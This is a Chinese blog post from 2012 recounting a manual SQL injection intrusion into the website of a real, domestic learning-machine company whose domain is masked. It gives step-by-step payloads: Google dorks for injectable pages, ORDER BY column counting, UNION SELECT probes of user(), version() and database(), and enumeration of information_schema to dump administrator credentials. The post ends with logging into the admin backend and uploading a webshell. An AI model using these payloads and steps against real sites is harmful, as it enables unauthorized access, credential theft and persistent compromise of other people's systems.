手工注入国内某学习机公司网站简单过程 不指定

Heck post in 入侵检测 2012/05/05 00:57 评论(0) 阅读(1247) | |
1、首先google hacking一把,在谷歌搜索框中输入site:xxxxx.com  inurl:asp/php?id=

2、判断是否过敏。

3、And 1=1   and 1=2  

4、Order by x--    x为数字,猜解有几个表段。。。

5、猜解到x以后,记住x的值。。。。

6、And 1=2 union select 1,2,3,4,5,....,x--

7、页面会报错,并出现数字,假设初相的数字是5,那么这一步就这样做:(用user()替换第六步中的5,再次提交)。报错的页面5的位置,会出现被5所覆盖的字符串的内容。记录该内容,这里用^表示。

8、再用version()替换刚才user()的位置,再次提交,目的是为了获取数据库的版本。报错的页面^的位置的内容会变为版本号码,例如5.0.27。


9、用database()替换上一步中的version(),查看当前库的名字,记录为^^。

10、MySQL5.0以上的版本添加了一个虚拟库information_schema,存储的是其他库的库名,表明,还有字段。

11、And 1=2 1,2,3,4,table_name,6,.....,x空格from information_schema.tables where table_schema=^^--(这一步要将^^的内容转换成十六进制在提交),提交之后,页面就会显示出库^^中所有的表名。将^^--改为^^ limit 0,1--提交,之页面只显示管理员账户的表名,记录为^^^。下面提交的时候要记得将^^^转换为十六进制再提交。

12、爆字段。And 1=2 1,2,3,4,column_name,6,.....,x空格from information_schema.columns where table_name=^^^limit 0,1--     提交,之后会爆出字段,记录为^^^^*。将limit 0,1改为limit 0,2再提交,可以再爆下一个字段^^^^&。

13、爆字段。And 1=2 1,2,3,4,^^^^*,6,...,x from ^^ limit 0,1--  提交,爆出该字段中第一个用户帐号。同样,用And 1=2 1,2,3,4,^^^^&,6,...,x from ^^ limit 0,1--提交,爆出与帐号对应的内容。

14、下面要找该网站的管理后台。。。有了帐号密码,再有后台登录URL,那么就可以进入后台了。:)。。。可以用啊D工具扫描后台,很容易的,你下载一个啊D,一看就会了。这里举个例子,一般后台的地址都是http://******.com/login.php之类的。。。之后用浏览器打开http://******.com/login.php,输入你爆出来的帐号和密码。

15、登陆成功以后,要找到网站后台可以上传的地方。

在可以上传的地方,上传webshell。



来源:Heck's Blog
地址:http://www.hecks.tk/sql-injection-inner-learning-machine-website/
转载时须以链接形式注明作者和原始出处及本声明,否则将追究法律责任,谢谢配合!
Tags: ,